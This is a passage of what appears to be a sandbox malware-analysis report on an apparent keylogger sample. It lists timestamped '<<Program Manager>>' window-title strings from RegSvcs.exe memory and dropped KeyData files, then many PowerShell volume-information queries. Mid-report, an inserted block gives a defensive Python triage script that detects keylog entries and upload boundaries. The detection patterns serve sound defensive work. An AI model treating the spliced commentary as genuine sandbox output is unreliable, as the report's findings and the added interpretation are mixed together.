                    Source: RegSvcs.exe, 0000000C.00000002.2561120329.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--:14:56]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A7B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:19]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B0C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:13:35]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561943396.0000000003603000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561120329.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:02]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2562039910.0000000003E40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerC\dons\7<
                    Source: RegSvcs.exe, 0000000C.00000002.2561943396.0000000003603000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3:21]<<Program Manager>>
                    Source: KeyDataanrcUwNr.txt.12.drBinary or memory string: [17:13:15]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B2D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000BA6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:13:48]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, KeyDataanrcUwNr.txt.12.drBinary or memory string: [17:13:14]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000BA6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B2D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000BA6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:13:47]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A7B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:26<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2561816569.00000000035A3000.00000004.00000020.00020000.00000000.sdmp, KeyDataIbAKZyhh.txt.12.drBinary or memory string: [17:14:24]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2561120329.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--:53]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B0C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561120329.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:57]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2562039910.0000000003E6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :14:05]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, KeyDataanrcUwNr.txt.12.drBinary or memory string: [17:13:16]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:13:47]..Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561065665.0000000000BB3000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561943396.0000000003603000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:56]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:02]<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2561816569.00000000035A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:26]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [7:14:55]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:06]<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2561816569.00000000035A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:25]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :14:06]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B2D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000BA6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:13:50]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2561943396.0000000003603000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2562493218.0000000004133000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:03]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B2D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000BA6000.00000004.00000020.00020000.00000000.sdmp, KeyDataZTfirKfY.txt.12.drBinary or memory string: [17:13:46]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000BA6000.00000004.00000020.00020000.00000000.sdmp, KeyDataIbAKZyhh.txt.12.dr, KeyDataSSnjLnso.txt.12.drBinary or memory string: [17:14:22]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561943396.0000000003603000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561120329.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:05]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:55]<<Program Manager>>:
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B0C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:57]<<Program Manager
                    Source: KeyDataSSnjLnso.txt.12.drBinary or memory string: [17:14:21]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2561943396.0000000003603000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A64000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2561816569.00000000035A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:04]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000BA6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:23]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2562493218.0000000004133000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561943396.0000000003603000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561120329.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:06]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B2D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000BA6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:13:49]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000BA6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerC\userager7
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 17:14:17]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2562039910.0000000003E40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerC\lfonsocument
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerxtxt:::te
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B0C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561120329.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:58]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, KeyDataanrcUwNr.txt.12.drBinary or memory string: [17:13:13]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000BA6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerC\d Manager
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:40]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B0C000.00000004.00000020.00020000.00000000.sdmp, KeyDataffeKRuYR.txt.12.drBinary or memory string: [17:13:30]<<Program Manager>>
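The timestamped `[HH:MM:SS]<<Program Manager>>` strings listed above, repeated across the RegSvcs.exe memory dumps and the dropped KeyData*.txt files, read as keylogger entries that record the active window title, and the `--3fbd04f5-b1ed-4060-99b9-fca7ff59c113--` fragments read as the closing delimiter of a multipart/form-data body (the upload of that log). Both readings are an interpretation of the listed strings, not something the report states. The following Python triage script is an added example, not code from the report or from the sample: it recovers well-formed entries and boundary tokens from a dropped file or memory dump and scores the match. It assumes the entry format and the `KeyData` + eight letters + `.txt` file-name pattern exactly as listed, the 0..3 score is a hypothetical heuristic, and the sample blob is constructed inside the script.

```python
"""Triage helper for keylog-style strings of the shape the report lists.

Added example; not part of the Joe Sandbox report or the DarkCloud sample.
"""
import os
import re
from collections import Counter
from dataclasses import dataclass, field

# "[17:14:16]<<Program Manager>>" -> timestamp + active window title.
# Interpretation of the report's strings, not documented DarkCloud behaviour.
ENTRY_RE = re.compile(rb"\[(\d{2}:\d{2}:\d{2})\]<<([^<>\r\n]*)>>")
# "--3fbd04f5-b1ed-4060-99b9-fca7ff59c113--": closing delimiter of a
# multipart/form-data body whose boundary is a GUID.
BOUNDARY_RE = re.compile(rb"--([0-9a-fA-F]{8}(?:-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12})--")
# Dropped-file names seen in the report: KeyData + 8 letters + .txt
KEYDATA_NAME_RE = re.compile(r"^KeyData[A-Za-z]{8}\.txt$")


@dataclass
class Triage:
    entries: list = field(default_factory=list)    # (timestamp, title) pairs
    boundaries: list = field(default_factory=list)  # unique boundary GUIDs
    keydata_name: bool = False

    @property
    def score(self) -> int:
        """Hypothetical 0..3 heuristic: enough entries, boundary token, file name."""
        return int(len(self.entries) >= 3) + int(bool(self.boundaries)) + int(self.keydata_name)


def parse_keylog_entries(data: bytes) -> list[tuple[str, str]]:
    """Well-formed (HH:MM:SS, window title) pairs in order of appearance.

    Truncated fragments such as "[17:14:20]<<Program Manager" (the report shows
    several, where the log was partly overwritten in memory) are skipped.
    """
    return [(ts.decode(), title.decode("utf-8", "replace"))
            for ts, title in ENTRY_RE.findall(data)]


def find_multipart_boundaries(data: bytes) -> list[str]:
    """Unique GUID-style multipart boundary tokens, lower-cased, first-seen order."""
    seen: list[str] = []
    for raw in BOUNDARY_RE.findall(data):
        token = raw.decode().lower()
        if token not in seen:
            seen.append(token)
    return seen


def is_keydata_filename(name: str) -> bool:
    """True for names like KeyDataUxuffJyW.txt, as dropped by process 12."""
    return KEYDATA_NAME_RE.match(os.path.basename(name)) is not None


def triage_blob(data: bytes, filename: str = "") -> Triage:
    """Run all three checks over one blob (file contents or a memory dump)."""
    return Triage(entries=parse_keylog_entries(data),
                  boundaries=find_multipart_boundaries(data),
                  keydata_name=is_keydata_filename(filename))


def window_title_histogram(entries) -> Counter:
    """Which windows were in the foreground while the log was written."""
    return Counter(title for _, title in entries)


def scan_directory(root: str, min_score: int = 2) -> dict[str, Triage]:
    """Walk a directory of dropped files or dumps and keep blobs at/above min_score."""
    hits: dict[str, Triage] = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    result = triage_blob(fh.read(), name)
            except OSError:
                continue
            if result.score >= min_score:
                hits[path] = result
    return hits


# Constructed sample blob (not the sample's real file): three well-formed
# entries, one with trailing junk, one truncated entry, and a boundary line.
SAMPLE_BLOB = (
    b"[17:13:13]<<Program Manager>>\r\n"
    b"[17:13:14]<<Program Manager>>\r\n"
    b"[17:14:02]<<Program Manager>>5\r\n"
    b"[17:14:20]<<Program Manager\r\n"            # truncated, skipped by the parser
    b"--3fbd04f5-b1ed-4060-99b9-fca7ff59c113--\r\n"
)

if __name__ == "__main__":
    t = triage_blob(SAMPLE_BLOB, "KeyDataUxuffJyW.txt")
    print("entries:   ", t.entries)
    print("boundaries:", t.boundaries)
    print("titles:    ", dict(window_title_histogram(t.entries)))
    print("score:     ", t.score)
```

Run it against the sandbox's dropped-files folder with `scan_directory(path)`; a blob that carries only the boundary token (for example a captured HTTP body) scores 1 and is reported only if `min_score` is lowered, which keeps generic multipart uploads from being flagged on their own.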
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe Queries volume information: C:\Users\user\Desktop\g44YQtTyjN.exe VolumeInformation
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
